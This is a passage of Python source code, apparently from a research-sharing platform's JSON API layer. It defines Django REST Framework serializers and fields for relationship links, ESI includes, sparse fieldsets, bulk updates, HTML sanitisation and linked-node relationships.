filter={'target': '<_id>'})
)
"""
json_api_link = True # serializes to a links object
def __init__(
self, related_view=None, related_view_kwargs=None, self_view=None, self_view_kwargs=None,
self_meta=None, related_meta=None, always_embed=False, filter=None, filter_key=None, required=False, **kwargs
):
related_view = related_view
self_view = self_view
related_kwargs = related_view_kwargs
self_kwargs = self_view_kwargs
self.views = {'related': related_view, 'self': self_view}
self.view_kwargs = {'related': related_kwargs, 'self': self_kwargs}
self.related_meta = related_meta
self.self_meta = self_meta
self.always_embed = always_embed
self.filter = filter
self.filter_key = filter_key
assert (related_view is not None or self_view is not None), 'Self or related view must be specified.'
if related_view:
assert related_kwargs is not None, 'Must provide related view kwargs.'
if not callable(related_kwargs):
assert isinstance(
related_kwargs,
dict,
), "Related view kwargs must have format {'lookup_url_kwarg: lookup_field}."
if self_view:
assert self_kwargs is not None, 'Must provide self view kwargs.'
assert isinstance(self_kwargs, dict), "Self view kwargs must have format {'lookup_url_kwarg: lookup_field}."
view_name = related_view
if view_name:
lookup_kwargs = related_kwargs
else:
view_name = self_view
lookup_kwargs = self_kwargs
if kwargs.get('lookup_url_kwarg', None):
lookup_kwargs = kwargs.pop('lookup_url_kwarg')
super(RelationshipField, self).__init__(view_name, lookup_url_kwarg=lookup_kwargs, **kwargs)
# Allow a RelationshipField to be modified if explicitly set so
if kwargs.get('read_only') is not None:
self.read_only = kwargs['read_only']
# Allow a RelationshipField to be required
if required:
assert not self.read_only, 'May not set both `read_only` and `required`'
self.required = required
def resolve(self, resource, field_name, request):
"""
Resolves the view when embedding.
"""
lookup_url_kwarg = self.lookup_url_kwarg
if callable(lookup_url_kwarg):
lookup_url_kwarg = lookup_url_kwarg(getattr(resource, field_name))
kwargs = {attr_name: self.lookup_attribute(resource, attr) for (attr_name, attr) in lookup_url_kwarg.items()}
kwargs.update({'version': request.parser_context['kwargs']['version']})
view = self.view_name
if callable(self.view_name):
view = view(getattr(resource, field_name))
return resolve(
reverse(
view,
kwargs=kwargs,
),
)
def process_related_counts_parameters(self, params, value):
"""
Processes related_counts parameter.
Can either be a True/False value for fetching counts on all fields, or a comma-separated list for specifying
individual fields. Ensures field for which we are requesting counts is a relationship field.
"""
if utils.is_truthy(params) or utils.is_falsy(params):
return params
field_counts_requested = [val for val in params.split(',')]
countable_fields = {field for field in self.parent.fields if
getattr(self.parent.fields[field], 'json_api_link', False) or
getattr(getattr(self.parent.fields[field], 'field', None), 'json_api_link', None)}
for count_field in field_counts_requested:
# Some fields will hide relationships, e.g. HideIfWithdrawal
# Ignore related_counts for these fields
fetched_field = self.parent.fields.get(count_field)
hidden = fetched_field and isinstance(fetched_field, HideIfWithdrawal) and getattr(value, 'is_retracted', False)
if not hidden and count_field not in countable_fields:
raise api_exceptions.InvalidQueryStringError(
detail="Acceptable values for the related_counts query param are 'true', 'false', or any of the relationship fields; got '{0}'".format(
params,
),
parameter='related_counts',
)
return field_counts_requested
def get_meta_information(self, meta_data, value):
"""
For retrieving meta values, otherwise returns {}
"""
meta = {}
for key in meta_data or {}:
if key == 'count' or key == 'unread':
show_related_counts = self.context['request'].query_params.get('related_counts', False)
if self.context['request'].parser_context.get('kwargs'):
if self.context['request'].parser_context['kwargs'].get('is_embedded'):
show_related_counts = False
field_counts_requested = self.process_related_counts_parameters(show_related_counts, value)
if utils.is_truthy(show_related_counts):
meta[key] = functional.rapply(meta_data[key], _url_val, obj=value, serializer=self.parent, request=self.context['request'])
elif utils.is_falsy(show_related_counts):
continue
elif self.field_name in field_counts_requested:
meta[key] = functional.rapply(meta_data[key], _url_val, obj=value, serializer=self.parent, request=self.context['request'])
else:
continue
elif key == 'projects_in_common':
if not utils.get_user_auth(self.context['request']).user:
continue
if not self.context['request'].query_params.get('show_projects_in_common', False):
continue
meta[key] = functional.rapply(meta_data[key], _url_val, obj=value, serializer=self.parent, request=self.context['request'])
else:
meta[key] = functional.rapply(meta_data[key], _url_val, obj=value, serializer=self.parent, request=self.context['request'])
return meta
def lookup_attribute(self, obj, lookup_field):
"""
Returns attribute from target object unless attribute surrounded in angular brackets where it returns the lookup field.
Also handles the lookup of nested attributes.
"""
bracket_check = _tpl(lookup_field)
if bracket_check:
source_attrs = bracket_check.split('.')
# If you are using a nested attribute for lookup, and you get the attribute wrong, you will not get an
# error message, you will just not see that field. This allows us to have slightly more dynamic use of
# nested attributes in relationship fields.
try:
return_val = get_nested_attributes(obj, source_attrs)
except (KeyError, AttributeError):
return None
return return_val
return lookup_field
def kwargs_lookup(self, obj, kwargs_dict):
"""
For returning kwargs dictionary of format {"lookup_url_kwarg": lookup_value}
"""
if callable(kwargs_dict):
kwargs_dict = kwargs_dict(obj)
kwargs_retrieval = {}
for lookup_url_kwarg, lookup_field in kwargs_dict.items():
if _tpl(lookup_field):
lookup_value = self.lookup_attribute(obj, lookup_field)
else:
lookup_value = _url_val(lookup_field, obj, self.parent, self.context['request'])
if lookup_value is None:
return None
kwargs_retrieval[lookup_url_kwarg] = lookup_value
return kwargs_retrieval
# Overrides HyperlinkedIdentityField
def get_url(self, obj, view_name, request, format):
urls = {}
for view_name, view in self.views.items():
if view is None:
urls[view_name] = {}
else:
kwargs = self.kwargs_lookup(obj, self.view_kwargs[view_name])
if kwargs is None:
urls[view_name] = {}
else:
if callable(view):
view = view(getattr(obj, self.field_name))
if request.parser_context['kwargs'].get('version', False):
kwargs.update({'version': request.parser_context['kwargs']['version']})
url = self.reverse(view, kwargs=kwargs, request=request, format=format)
if self.filter:
formatted_filters = self.format_filter(obj)
if formatted_filters:
for filter in formatted_filters:
url = utils.extend_querystring_params(
url,
{'filter[{}]'.format(filter['field_name']): filter['value']},
)
else:
url = None
if url:
url = utils.extend_querystring_if_key_exists(
url, self.context['request'],
'view_only',
)
urls[view_name] = url
if not urls['self'] and not urls['related']:
urls = None
return urls
def to_esi_representation(self, value, envelope='data'):
relationships = self.to_representation(value)
try:
href = relationships['links']['related']['href']
except KeyError:
raise SkipField
else:
if href and not href == '{}':
if self.always_embed:
envelope = 'data'
query_dict = dict(format=['jsonapi', ], envelope=[envelope, ])
if 'view_only' in self.parent.context['request'].query_params.keys():
query_dict.update(view_only=[self.parent.context['request'].query_params['view_only']])
esi_url = utils.extend_querystring_params(href, query_dict)
return '<esi:include src="{}"/>'.format(esi_url)
def format_filter(self, obj):
""" Take filters specified in self.filter and format them in a way that can be easily parametrized
:param obj: RelationshipField object
:return: list of dictionaries with 'field_name' and 'value' for each filter
"""
filter_fields = self.filter.keys()
filters = []
for field_name in filter_fields:
try:
# check if serializer method passed in
serializer_method = getattr(self.parent, self.filter[field_name])
except AttributeError:
value = self.lookup_attribute(obj, self.filter[field_name])
else:
value = serializer_method(obj)
if not value:
continue
filters.append({'field_name': field_name, 'value': value})
return filters if filters else None
def to_internal_value(self, data):
return data
# Overrides HyperlinkedIdentityField
def to_representation(self, value):
request = self.context.get('request', None)
format = self.context.get('format', None)
assert request is not None, (
'`%s` requires the request in the serializer'
" context. Add `context={'request': request}` when instantiating "
'the serializer.' % self.__class__.__name__
)
# By default use whatever format is given for the current context
# unless the target is a different type to the source.
#
# Eg. Consider a HyperlinkedIdentityField pointing from a json
# representation to an html property of that representation...
#
# '/snippets/1/' should link to '/snippets/1/highlight/'
# ...but...
# '/snippets/1/.json' should link to '/snippets/1/highlight/.html'
if format and self.format and self.format != format:
format = self.format
# Return the hyperlink, or error if incorrectly configured.
try:
url = self.get_url(value, self.view_name, request, format)
except NoReverseMatch:
msg = (
'Could not resolve URL for hyperlinked relationship using '
'view name "%s". You may have failed to include the related '
'model in your API, or incorrectly configured the '
'`lookup_field` attribute on this field.'
)
if value in ('', None):
value_string = {'': 'the empty string', None: 'None'}[value]
msg += (
' WARNING: The value of the field on the model instance '
"was %s, which may be why it didn't match any "
'entries in your URL conf.' % value_string
)
raise ImproperlyConfigured(msg % self.view_name)
if url is None:
# Prior to 2.9, empty relationships were omitted from the response.
# This conflicts with the JSON-API spec and was fixed in 2.9.
if StrictVersion(request.version) < StrictVersion('2.9'):
raise SkipField
else:
return {'data': None}
related_url = url['related']
related_path = urlparse(related_url).path if related_url else None
related_meta = self.get_meta_information(self.related_meta, value)
self_url = url['self']
self_meta = self.get_meta_information(self.self_meta, value)
relationship = format_relationship_links(related_url, self_url, related_meta, self_meta)
if related_url and (len(related_path.split('/')) & 1) == 1:
resolved_url = resolve(related_path)
related_class = resolved_url.func.view_class
if issubclass(related_class, RetrieveModelMixin):
related_type = resolved_url.namespace
try:
# TODO: change kwargs to preprint_provider_id and registration_id
if related_type == 'preprint_providers':
related_id = resolved_url.kwargs['provider_id']
elif related_type == 'registrations':
related_id = resolved_url.kwargs['node_id']
else:
related_id = resolved_url.kwargs[related_type[:-1] + '_id']
except KeyError:
return relationship
relationship['data'] = {'id': related_id, 'type': related_type}
return relationship
class TypedRelationshipField(RelationshipField):
""" Overrides get_url to inject a typed namespace.
Assumption: Namespaces for each type MUST be the same as the dasharized JSONAPI-type
"""
def get_url(self, obj, view_name, request, format):
if len(view_name.split(':')) == 2:
untyped_view = view_name
view_parts = view_name.split(':')
request = self.context.get('request', None)
if isinstance(self.root, JSONAPIListSerializer):
view_parts.insert(1, get_meta_type(self.root.child, request).replace('_', '-'))
else:
view_parts.insert(1, get_meta_type(self.root, request).replace('_', '-'))
self.view_name = view_name = ':'.join(view_parts)
for k, v in self.views.items():
if v == untyped_view:
self.views[k] = view_name
return super(TypedRelationshipField, self).get_url(obj, view_name, request, format)
class FileRelationshipField(RelationshipField):
def get_url(self, obj, view_name, request, format):
if obj.kind == 'folder':
raise SkipField
return super(FileRelationshipField, self).get_url(obj, view_name, request, format)
class TargetField(ser.Field):
"""
Field that returns a nested dict with the url (constructed based
on the object's type), optional meta information, and link_type.
Example:
target = TargetField(link_type='related', meta={'type': 'get_target_type'})
"""
json_api_link = True # serializes to a links object
view_map = {
'node': {
'view': 'nodes:node-detail',
'lookup_kwarg': 'node_id',
},
'preprint': {
'view': 'preprints:preprint-detail',
'lookup_kwarg': 'preprint_id',
},
'comment': {
'view': 'comments:comment-detail',
'lookup_kwarg': 'comment_id',
},
'nodewikipage': {
'view': None,
'lookup_kwarg': None,
},
}
def __init__(self, **kwargs):
self.meta = kwargs.pop('meta', {})
self.link_type = kwargs.pop('link_type', 'url')
super(TargetField, self).__init__(read_only=True, **kwargs)
def resolve(self, resource, field_name, request):
"""
Resolves the view for target node or target comment when embedding.
"""
view_info = self.view_map.get(resource.target.referent._name, None)
if not view_info:
raise api_exceptions.TargetNotSupportedError('{} is not a supported target type'.format(
resource.target._name,
))
if not view_info['view']:
return None, None, None
embed_value = resource.target._id
return resolve(
reverse(
view_info['view'],
kwargs={
view_info['lookup_kwarg']: embed_value,
'version': request.parser_context['kwargs']['version'],
},
),
)
def to_esi_representation(self, value, envelope='data'):
href = value.get_absolute_url()
if href:
esi_url = utils.extend_querystring_params(href, dict(envelope=[envelope, ], format=['jsonapi', ]))
return '<esi:include src="{}"/>'.format(esi_url)
return self.to_representation(value)
def to_representation(self, value):
"""
Returns nested dictionary in format {'links': {'self.link_type': ... }
If no meta information, self.link_type is equal to a string containing link's URL. Otherwise,
the link is represented as a links object with 'href' and 'meta' members.
"""
meta = functional.rapply(self.meta, _url_val, obj=value, serializer=self.parent, request=self.context['request'])
obj = getattr(value, 'referent', value)
return {'links': {self.link_type: {'href': obj.get_absolute_url(), 'meta': meta}}}
class LinksField(ser.Field):
"""Links field that resolves to a links object. Used in conjunction with `Link`.
If the object to be serialized implements `get_absolute_url`, then the return value
of that method is used for the `self` link.
Example: ::
links = LinksField({
'html': 'absolute_url',
'children': {
'related': Link('nodes:node-children', node_id='<_id>'),
'count': 'get_node_count'
},
'contributors': {
'related': Link('nodes:node-contributors', node_id='<_id>'),
'count': 'get_contrib_count'
},
'registrations': {
'related': Link('nodes:node-registrations', node_id='<_id>'),
'count': 'get_registration_count'
},
})
"""
def __init__(self, links, *args, **kwargs):
ser.Field.__init__(self, read_only=True, *args, **kwargs)
self.links = links
def get_attribute(self, obj):
# We pass the object instance onto `to_representation`,
# not just the field attribute.
return obj
def extend_absolute_info_url(self, obj):
return utils.extend_querystring_if_key_exists(obj.get_absolute_info_url(), self.context['request'], 'view_only')
def extend_absolute_url(self, obj):
return utils.extend_querystring_if_key_exists(obj.get_absolute_url(), self.context['request'], 'view_only')
def to_representation(self, obj):
ret = {}
for name, value in self.links.items():
try:
url = _url_val(value, obj=obj, serializer=self.parent, request=self.context['request'])
except SkipField:
continue
else:
ret[name] = url
if hasattr(obj, 'get_absolute_url') and 'self' not in self.links:
ret['self'] = self.extend_absolute_url(obj)
if 'info' in ret:
if hasattr(obj, 'get_absolute_info_url'):
ret['info'] = self.extend_absolute_info_url(obj)
else:
ret['info'] = utils.extend_querystring_if_key_exists(ret['info'], self.context['request'], 'view_only')
return ret
_tpl_pattern = re.compile(r'\s*<\s*(\S*)\s*>\s*')
def _tpl(val):
"""Return value within ``< >`` if possible, else return ``None``."""
match = _tpl_pattern.match(val)
if match:
return match.groups()[0]
return None
def _get_attr_from_tpl(attr_tpl, obj):
attr_name = _tpl(str(attr_tpl))
if attr_name:
attribute_value = obj
for attr_segment in attr_name.split('.'):
attribute_value = getattr(attribute_value, attr_segment, ser.empty)
if attribute_value is not ser.empty:
return attribute_value
elif attr_name in obj:
return obj[attr_name]
else:
raise AttributeError(
'{attr_name!r} is not a valid '
'attribute of {obj!r}'.format(
attr_name=attr_name, obj=obj,
),
)
else:
return attr_tpl
# TODO: Make this a Field that is usable on its own?
class Link(object):
"""Link object to use in conjunction with Links field. Does reverse lookup of
URLs given an endpoint name and attributed enclosed in `<>`. This includes
complex key strings like 'user.id'
"""
def __init__(self, endpoint, args=None, kwargs=None, query_kwargs=None, **kw):
self.endpoint = endpoint
self.kwargs = kwargs or {}
self.args = args or tuple()
self.reverse_kwargs = kw
self.query_kwargs = query_kwargs or {}
def resolve_url(self, obj, request):
kwarg_values = {key: _get_attr_from_tpl(attr_tpl, obj) for key, attr_tpl in self.kwargs.items()}
kwarg_values.update({'version': request.parser_context['kwargs']['version']})
arg_values = [_get_attr_from_tpl(attr_tpl, obj) for attr_tpl in self.args]
query_kwarg_values = {key: _get_attr_from_tpl(attr_tpl, obj) for key, attr_tpl in self.query_kwargs.items()}
# Presumably, if you have are expecting a value but the value is empty, then the link is invalid.
for item in kwarg_values:
if kwarg_values[item] is None:
raise SkipField
return utils.absolute_reverse(
self.endpoint,
args=arg_values,
kwargs=kwarg_values,
query_kwargs=query_kwarg_values,
**self.reverse_kwargs
)
class WaterbutlerLink(Link):
"""Link object to use in conjunction with Links field. Builds a Waterbutler URL for files.
"""
def __init__(self, must_be_file=None, must_be_folder=None, **kwargs):
self.kwargs = kwargs
self.must_be_file = must_be_file
self.must_be_folder = must_be_folder
def resolve_url(self, obj, request):
"""Reverse URL lookup for WaterButler routes
"""
if self.must_be_folder is True and not obj.path.endswith('/'):
raise SkipField
if self.must_be_file is True and obj.path.endswith('/'):
raise SkipField
if 'view_only' not in self.kwargs:
view_only = request.query_params.get('view_only', False)
if view_only:
self.kwargs['view_only'] = view_only
base_url = None
if hasattr(obj.target, 'osfstorage_region'):
base_url = obj.target.osfstorage_region.waterbutler_url
url = utils.waterbutler_api_url_for(obj.target._id, obj.provider, obj.path, base_url=base_url, **self.kwargs)
if not url:
raise SkipField
else:
return url
class NodeFileHyperLinkField(RelationshipField):
def __init__(self, kind=None, never_embed=False, **kws):
self.kind = kind
self.never_embed = never_embed
super(NodeFileHyperLinkField, self).__init__(**kws)
def get_url(self, obj, view_name, request, format):
if self.kind and obj.kind != self.kind:
raise SkipField
return super(NodeFileHyperLinkField, self).get_url(obj, view_name, request, format)
class JSONAPIListSerializer(ser.ListSerializer):
def to_representation(self, data):
enable_esi = self.context.get('enable_esi', False)
envelope = self.context.update({'envelope': None})
# Don't envelope when serializing collection
errors = {}
bulk_skip_uneditable = utils.is_truthy(self.context['request'].query_params.get('skip_uneditable', False))
if isinstance(data, collections.Mapping):
errors = data.get('errors', None)
data = data.get('data', None)
if enable_esi:
ret = [
self.child.to_esi_representation(item, envelope=None) for item in data
]
else:
ret = [
self.child.to_representation(item, envelope=envelope) for item in data
]
if errors and bulk_skip_uneditable:
ret.append({'errors': errors})
return ret
# Overrides ListSerializer which doesn't support multiple update by default
def update(self, instance, validated_data):
# avoiding circular import
from api.nodes.serializers import CompoundIDField
# if PATCH request, the child serializer's partial attribute needs to be True
if self.context['request'].method == 'PATCH':
self.child.partial = True
bulk_skip_uneditable = utils.is_truthy(self.context['request'].query_params.get('skip_uneditable', False))
if not bulk_skip_uneditable:
if len(instance) != len(validated_data):
raise exceptions.ValidationError({'non_field_errors': 'Could not find all objects to update.'})
id_lookup = self.child.fields['id'].source
data_mapping = {item.get(id_lookup): item for item in validated_data}
if isinstance(self.child.fields['id'], CompoundIDField):
instance_mapping = {self.child.fields['id'].get_id(item): item for item in instance}
else:
instance_mapping = {getattr(item, id_lookup): item for item in instance}
ret = {'data': []}
for resource_id, resource in instance_mapping.items():
data = data_mapping.pop(resource_id, None)
ret['data'].append(self.child.update(resource, data))
# If skip_uneditable in request, add validated_data for nodes in which the user did not have edit permissions to errors
if data_mapping and bulk_skip_uneditable:
ret.update({'errors': data_mapping.values()})
return ret
# overrides ListSerializer
def run_validation(self, data):
meta = getattr(self, 'Meta', None)
bulk_limit = getattr(meta, 'bulk_limit', BULK_SETTINGS['DEFAULT_BULK_LIMIT'])
num_items = len(data)
if num_items > bulk_limit:
raise api_exceptions.JSONAPIException(
source={'pointer': '/data'},
detail='Bulk operation limit is {}, got {}.'.format(bulk_limit, num_items),
)
return super(JSONAPIListSerializer, self).run_validation(data)
# overrides ListSerializer: Add HTML-sanitization similar to that used by APIv1 front-end views
def is_valid(self, clean_html=True, **kwargs):
"""
After validation, scrub HTML from validated_data prior to saving (for create and update views)
Exclude 'type' from validated_data.
"""
ret = super(JSONAPIListSerializer, self).is_valid(**kwargs)
if clean_html is True:
self._validated_data = functional.rapply(self.validated_data, sanitize.strip_html)
for data in self._validated_data:
data.pop('type', None)
return ret
class SparseFieldsetMixin(object):
def parse_sparse_fields(self, allow_unsafe=False, **kwargs):
request = kwargs.get('context', {}).get('request', None)
if request and (allow_unsafe or request.method in permissions.SAFE_METHODS):
sparse_fieldset_query_param = 'fields[{}]'.format(get_meta_type(self, request))
if sparse_fieldset_query_param in request.query_params:
fieldset = request.query_params[sparse_fieldset_query_param].split(',')
for field_name in self.fields.fields.copy().keys():
if field_name in ('id', 'links', 'type'):
# MUST return these fields
continue
if field_name not in fieldset:
self.fields.pop(field_name)
class BaseAPISerializer(ser.Serializer, SparseFieldsetMixin):
def __init__(self, *args, **kwargs):
self.parse_sparse_fields(**kwargs)
super(BaseAPISerializer, self).__init__(*args, **kwargs)
self.model_field_names = [
name if field.source == '*' else field.source
for name, field in self.fields.items()
]
class JSONAPISerializer(BaseAPISerializer):
"""Base serializer. Requires that a `type_` option is set on `class Meta`. Also
allows for enveloping of both single resources and collections. Looks to nest fields
according to JSON API spec. Relational fields must set json_api_link=True flag.
Self/html links must be nested under "links".
"""
writeable_method_fields = frozenset([])
# Don't serialize relationships that use these views
# when viewing thru an anonymous VOL
views_to_hide_if_anonymous = {
'users:user-detail',
'nodes:node-registrations',
}
# overrides Serializer
@classmethod
def many_init(cls, *args, **kwargs):
kwargs['child'] = cls(*args, **kwargs)
return JSONAPIListSerializer(*args, **kwargs)
def invalid_embeds(self, fields, embeds):
fields_check = fields[:]
for index, field in enumerate(fields_check):
if getattr(field, 'field', None):
fields_check[index] = field.field
invalid_embeds = set(embeds.keys()) - set(
[f.field_name for f in fields_check if getattr(f, 'json_api_link', False)],
)
return invalid_embeds
def to_esi_representation(self, data, envelope='data'):
href = None
query_params_blacklist = ['page[size]']
href = self.get_absolute_url(data)
if href and href != '{}':
esi_url = furl.furl(href).add(args=dict(self.context['request'].query_params)).remove(
args=query_params_blacklist,
).remove(args=['envelope']).add(args={'envelope': envelope}).url
return '<esi:include src="{}"/>'.format(esi_url)
# failsafe, let python do it if something bad happened in the ESI construction
return super(JSONAPISerializer, self).to_representation(data)
def run_validation(self, data):
# Overrides construtor for validated_data to allow writes to a SerializerMethodField
# Validation for writeable SMFs is expected to happen in the model
_validated_data = super(JSONAPISerializer, self).run_validation(data)
for field in self.writeable_method_fields:
if field in data:
_validated_data[field] = data[field]
return _validated_data
def get_unwrapped_field(self, field):
"""
Returns the lowest nested field. If no nesting, returns the original field.
:param field, highest field
Assumes nested structures like the following:
- field, field.field, field.child_relation, field.field.child_relation, etc.
"""
while hasattr(field, 'field'):
field = field.field
return getattr(field, 'child_relation', field)
# overrides Serializer
def to_representation(self, obj, envelope='data'):
"""Serialize to final representation.
:param obj: Object to be serialized.
:param envelope: Key for resource object.
"""
ret = {}
request = self.context.get('request')
type_ = get_meta_type(self, request)
assert type_ is not None, 'Must define Meta.type_ or Meta.get_type()'
self.parse_sparse_fields(allow_unsafe=True, context=self.context)
data = {
'id': '',
'type': type_,
'attributes': {},
'relationships': {},
'embeds': {},
'links': {},
}
embeds = self.context.get('embed', {})
context_envelope = self.context.get('envelope', envelope)
if context_envelope == 'None':
context_envelope = None
enable_esi = self.context.get('enable_esi', False)
is_anonymous = is_anonymized(self.context['request'])
to_be_removed = set()
if is_anonymous and hasattr(self, 'non_anonymized_fields'):
# Drop any fields that are not specified in the `non_anonymized_fields` variable.
allowed = set(self.non_anonymized_fields)
existing = set(self.fields.keys())
to_be_removed = existing - allowed
fields = [
field for field in self.fields.values() if
not field.write_only and field.field_name not in to_be_removed
]
invalid_embeds = self.invalid_embeds(fields, embeds)
invalid_embeds = invalid_embeds - to_be_removed
if invalid_embeds:
raise api_exceptions.InvalidQueryStringError(
parameter='embed',
detail='The following fields are not embeddable: {}'.format(
', '.join(invalid_embeds),
),
)
for field in fields:
nested_field = self.get_unwrapped_field(field)
try:
if hasattr(field, 'child_relation'):
attribute = field.child_relation.get_attribute(obj)
else:
attribute = field.get_attribute(obj)
except SkipField:
continue
if attribute is None:
# We skip `to_representation` for `None` values so that
# fields do not have to explicitly deal with that case.
if isinstance(nested_field, RelationshipField):
# if this is a RelationshipField, serialize as a null relationship
data['relationships'][field.field_name] = {'data': None}
else:
# otherwise, serialize as an null attribute
data['attributes'][field.field_name] = None
else:
try:
if hasattr(field, 'child_relation'):
if hasattr(attribute, 'all'):
representation = field.child_relation.to_representation(attribute.all())
else:
representation = field.child_relation.to_representation(attribute)
else:
if hasattr(attribute, 'all'):
representation = field.to_representation(attribute.all())
else:
representation = field.to_representation(attribute)
except SkipField:
continue
if getattr(field, 'json_api_link', False) or getattr(nested_field, 'json_api_link', False):
# If embed=field_name is appended to the query string or 'always_embed' flag is True, directly embed the
# results in addition to adding a relationship link
if embeds and (field.field_name in embeds or getattr(field, 'always_embed', None)):
if enable_esi:
try:
result = field.to_esi_representation(attribute, envelope=envelope)
except SkipField:
continue
else:
try:
# If a field has an empty representation, it should not be embedded.
result = self.context['embed'][field.field_name](obj)
except SkipField:
result = None
if result:
data['embeds'][field.field_name] = result
else:
data['embeds'][field.field_name] = {'error': 'This field is not embeddable.'}
try:
if not (
is_anonymous and
hasattr(field, 'view_name') and
field.view_name in self.views_to_hide_if_anonymous
):
data['relationships'][field.field_name] = representation
except SkipField:
continue
elif field.field_name == 'id':
data['id'] = representation
elif field.field_name == 'links':
data['links'] = representation
else:
data['attributes'][field.field_name] = representation
if not data['relationships']:
del data['relationships']
if not data['embeds']:
del data['embeds']
if context_envelope:
ret[context_envelope] = data
if is_anonymous:
ret['meta'] = {'anonymous': True}
else:
ret = data
additional_meta = self.get_meta(obj)
if additional_meta:
meta_obj = ret.setdefault('meta', {})
meta_obj.update(additional_meta)
return ret
def get_absolute_url(self, obj):
raise NotImplementedError()
def get_meta(self, obj):
return None
def get_absolute_html_url(self, obj):
return utils.extend_querystring_if_key_exists(obj.absolute_url, self.context['request'], 'view_only')
# overrides Serializer: Add HTML-sanitization similar to that used by APIv1 front-end views
def is_valid(self, clean_html=True, **kwargs):
"""
After validation, scrub HTML from validated_data prior to saving (for create and update views)
Exclude 'type' and '_id' from validated_data.
"""
ret = super(JSONAPISerializer, self).is_valid(**kwargs)
if clean_html is True:
self._validated_data = self.sanitize_data()
self._validated_data.pop('type', None)
self._validated_data.pop('target_type', None)
if self.context['request'].method in utils.UPDATE_METHODS:
self._validated_data.pop('_id', None)
return ret
def sanitize_data(self):
return functional.rapply(self.validated_data, sanitize.strip_html)
class JSONAPIRelationshipSerializer(BaseAPISerializer):
"""Base Relationship serializer. Requires that a `type_` option is set on `class Meta`.
Provides a simplified serialization of the relationship, allowing for simple update request
bodies.
"""
id = ser.CharField(required=False, allow_null=True)
type = TypeField(required=False, allow_null=True)
def to_representation(self, obj):
request = self.context.get('request')
type_ = get_meta_type(self, request)
assert type_ is not None, 'Must define Meta.type_ or Meta.get_type()'
relation_id_field = self.fields['id']
attribute = relation_id_field.get_attribute(obj)
relationship = relation_id_field.to_representation(attribute)
data = {'type': type_, 'id': relationship} if relationship else None
return data
def DevOnly(field):
"""Make a field only active in ``DEV_MODE``. ::
experimental_field = DevMode(CharField(required=False))
"""
return field if settings.DEV_MODE else None
class RestrictedDictSerializer(ser.Serializer):
def to_representation(self, obj):
data = {}
fields = [field for field in self.fields.values() if not field.write_only]
for field in fields:
try:
attribute = field.get_attribute(obj)
except ser.SkipField:
continue
if attribute is None:
# We skip `to_representation` for `None` values so that
# fields do not have to explicitly deal with that case.
data[field.field_name] = None
else:
data[field.field_name] = field.to_representation(attribute)
return data
def relationship_diff(current_items, new_items):
"""
To be used in POST and PUT/PATCH relationship requests, as, by JSON API specs,
in update requests, the 'remove' items' relationships would be deleted, and the
'add' would be added, while for create requests, only the 'add' would be added.
:param current_items: The current items in the relationship
:param new_items: The items passed in the request
:return:
"""
return {
'add': {k: new_items[k] for k in (set(new_items.keys()) - set(current_items.keys()))},
'remove': {k: current_items[k] for k in (set(current_items.keys()) - set(new_items.keys()))},
}
class AddonAccountSerializer(JSONAPISerializer):
id = ser.CharField(source='_id', read_only=True)
provider = ser.CharField(read_only=True)
profile_url = ser.CharField(required=False, read_only=True)
display_name = ser.CharField(required=False, read_only=True)
links = links = LinksField({
'self': 'get_absolute_url',
})
class Meta:
@staticmethod
def get_type(request):
return get_kebab_snake_case_field(request.version, 'external-accounts')
def get_absolute_url(self, obj):
kwargs = self.context['request'].parser_context['kwargs']
kwargs.update({'account_id': obj._id})
return utils.absolute_reverse(
'users:user-external_account-detail',
kwargs=kwargs,
)
return obj.get_absolute_url()
class LinkedNode(JSONAPIRelationshipSerializer):
id = ser.CharField(source='_id', required=False, allow_null=True)
class Meta:
@staticmethod
def get_type(request):
if StrictVersion(request.version) < StrictVersion('2.13'):
return 'linked_nodes'
return 'nodes'
class LinkedRegistration(JSONAPIRelationshipSerializer):
id = ser.CharField(source='_id', required=False, allow_null=True)
class Meta:
@staticmethod
def get_type(request):
if StrictVersion(request.version) < StrictVersion('2.13'):
return 'linked_registrations'
return 'registrations'
class LinkedPreprint(LinkedNode):
class Meta:
@staticmethod
def get_type(request):
if StrictVersion(request.version) < StrictVersion('2.13'):
return 'linked_preprints'
return 'preprints'
class LinkedNodesRelationshipSerializer(BaseAPISerializer):
data = ser.ListField(child=LinkedNode())
links = LinksField({
'self': 'get_self_url',
'html': 'get_related_url',
})
def get_self_url(self, obj):
return obj['self'].linked_nodes_self_url
def get_related_url(self, obj):
return obj['self'].linked_nodes_related_url
class Meta:
@staticmethod
def get_type(request):
if StrictVersion(request.version) < StrictVersion('2.13'):
return 'linked_nodes'
return 'nodes'
def get_pointers_to_add_remove(self, pointers, new_pointers):
diff = relationship_diff(
current_items={pointer._id: pointer for pointer in pointers},
new_items={val['_id']: val for val in new_pointers},
)
nodes_to_add = []
for node_id in diff['add']:
node = AbstractNode.load(node_id) or Preprint.load(node_id)
if not node:
raise exceptions.NotFound(detail='Node with id "{}" was not found'.format(node_id))
nodes_to_add.append(node)
return nodes_to_add, diff['remove'].values()
def make_instance_obj(self, obj):
# Convenience method to format instance based on view's get_object
return {
'data': [
pointer for pointer in
obj.linked_nodes.filter(is_deleted=False, type='osf.node')
], 'self': obj,
}
def update(self, instance, validated_data):
collection = instance['self']
auth = utils.get_user_auth(self.context['request'])
add, remove = self.get_pointers_to_add_remove(pointers=instance['data'], new_pointers=validated_data['data'])
for pointer in remove:
collection.rm_pointer(pointer, auth)
for node in add:
try:
collection.add_pointer(node, auth)
except ValueError as e:
raise api_exceptions.InvalidModelValueError(
detail=str(e),
)
return self.make_instance_obj(collection)
def create(self, validated_data):
instance = self.context['view'].get_object()
auth = utils.get_user_auth(self.context['request'])
collection = instance['self']
add, remove = self.get_pointers_to_add_remove(pointers=instance['data'], new_pointers=validated_data['data'])
if not len(add):
raise api_exceptions.RelationshipPostMakesNoChanges
for node in add:
try:
collection.add_pointer(node, auth)
except ValueError as e:
raise api_exceptions.InvalidModelValueError(
detail=str(e),
)
return self.make_instance_obj(collection)
class LinkedRegistrationsRelationshipSerializer(BaseAPISerializer):
data = ser.ListField(child=LinkedRegistration())
links = LinksField({
'self': 'get_self_url',
'html': 'get_related_url',
})
def get_self_url(self, obj):
return obj['self'].linked_registrations_self_url
def get_related_url(self, obj):
return obj['self'].linked_registrations_related_url
class Meta:
@staticmethod
def get_type(request):
if StrictVersion(request.version) < StrictVersion('2.13'):
return 'linked_registrations'
return 'registrations'
def get_pointers_to_add_remove(self, pointers, new_pointers):
diff = relationship_diff(
current_items={pointer._id: pointer for pointer in pointers},
new_items={val['_id']: val for val in new_pointers},
)
nodes_to_add = []
for node_id in diff['add']:
node = AbstractNode.load(node_id)
if not node:
